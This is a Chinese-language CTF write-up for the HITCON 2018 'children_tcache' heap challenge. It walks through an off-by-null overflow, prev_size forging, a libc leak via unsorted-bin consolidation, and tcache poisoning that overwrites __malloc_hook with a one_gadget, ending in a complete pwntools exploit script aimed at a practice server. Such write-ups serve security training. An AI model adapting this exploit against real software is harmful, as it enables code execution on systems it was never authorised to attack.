image.png
    保护全开
    image.png
    这个判断将”\n”这个输入转换为”\x00”这里存在溢出,要用这个溢出的话我们申请的chunk要为0x100的倍数数这样我们后面操作的时候可以绕过一些判断
    大概思路就是下面图片这样
    image.png
    实现的时候
    image.png
    free之后还有memest,我们在弄tcache bin溢出的时候,那个所谓的pre size我们还要进行一些操作才能完成我们unsorted bin 的大合并

    1. for i in range(7):
    2.     payload = b'a'*0x60+b'\x90'+b'\x04'+b'a'*(6-i)
    3.     creat(0x68-i,payload)
    4.     free(0)

    尽管块管理机制是会申请固定倍数长度的堆块,但实际上能写的堆块是有限的,我们可以通过上面的方法将pre size给弄成我们想要的样子
    泄露libc的时候我们为什么不选下面这个堆块泄露libc,因为creat会将”\n”变成”\x00”,如果这里单独用send然后合适的方法也搞的定。image.png
    这是泄露libc

    1. creat(0x410,"aaa") #0
    2. creat(0x68,"bbb")  #1
    3. creat(0x4f0,"ccc") #2
    4. creat(0x60,"ddd")
    5. free(1)
    6. free(0)
    7. for i in range(7):
    8.     payload = b'a'*0x60+b'\x90'+b'\x04'+b'a'*(6-i)
    9.     creat(0x68-i,payload)
    10.     free(0)
    11. payload = b'a'*0x60+b'\x90'+b'\x04'
    12. creat(0x62,payload) #0
    13. free(2)
    14. creat(0x410,"eeeeee") #1
    15. show(0)
    16. addr = u64(io.recv(6).ljust(8,"\x00"))
    17. log.info("addr---------->"+hex(addr))
    18. libcbase = addr - 4111520
    19. log.info("libcbase------------>"+hex(libcbase))

    攻击的方式是通过这个tcache bin来实现的

    1. from pwn import*
    2. context.log_level='debug'
    3. io = process(['./HITCON_2018_children_tcache'],env={"LD_PRELOAD":"./libc-2.2764.so"})
    4. io = process("./HITCON_2018_children_tcache")
    5. io = remote("node4.buuoj.cn","27700")
    6. elf =ELF('./HITCON_2018_children_tcache')
    7. libc = ELF("./libc-2.2764.so")
    8. #libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
    9. def debug():
    10.     gdb.attach(io)
    11.     pause()
    12. def creat(size,value):
    13.     io.recvuntil("Your choice: ")
    14.     io.sendline("1")
    15.     io.recvuntil("Size:")
    16.     io.sendline(str(size))
    17.     io.recvuntil("Data:")
    18.     io.sendline(value)
    19. def show(index):
    20.     io.recvuntil("Your choice: ")
    21.     io.sendline("2")
    22.     io.recvuntil("Index:")
    23.     io.sendline(str(index))
    24. def free(index):
    25.     io.recvuntil("Your choice: ")
    26.     io.sendline("3")
    27.     io.recvuntil("Index:")
    28.     io.sendline(str(index))
    29. creat(0x410,"aaa") #0
    30. creat(0x68,"bbb")  #1
    31. creat(0x4f0,"ccc") #2
    32. creat(0x60,"ddd")
    33. free(1)
    34. free(0)
    35. for i in range(7):
    36.     payload = b'a'*0x60+b'\x90'+b'\x04'+b'a'*(6-i)
    37.     creat(0x68-i,payload)
    38.     free(0)
    39. payload = b'a'*0x60+b'\x90'+b'\x04'
    40. creat(0x62,payload) #0
    41. free(2)
    42. creat(0x410,"eeeeee") #1
    43. show(0)
    44. addr = u64(io.recv(6).ljust(8,"\x00"))
    45. log.info("addr---------->"+hex(addr))
    46. libcbase = addr - 4111520
    47. log.info("libcbase------------>"+hex(libcbase))
    48. creat(0x60,"fff")
    49. free(0)
    50. free(2)
    51. #debug()
    52. malloc_hook  = libcbase + libc.sym["__malloc_hook"]
    53. log.info("malloc_hook----------------->"+hex(malloc_hook))
    54. creat(0x60,p64(malloc_hook))
    55. creat(0x60,p64(malloc_hook))
    56. one_gadget = libcbase + 0x4f322
    57. log.info("one_gadget--------------->"+hex(one_gadget))
    58. creat(0x60,p64(one_gadget))
    59. #debug()
    60. io.recvuntil("Your choice: ")
    61. io.sendline("1")
    62. io.recvuntil("Size:")
    63. io.sendline("20")
    64. #debug()
    65. io.interactive()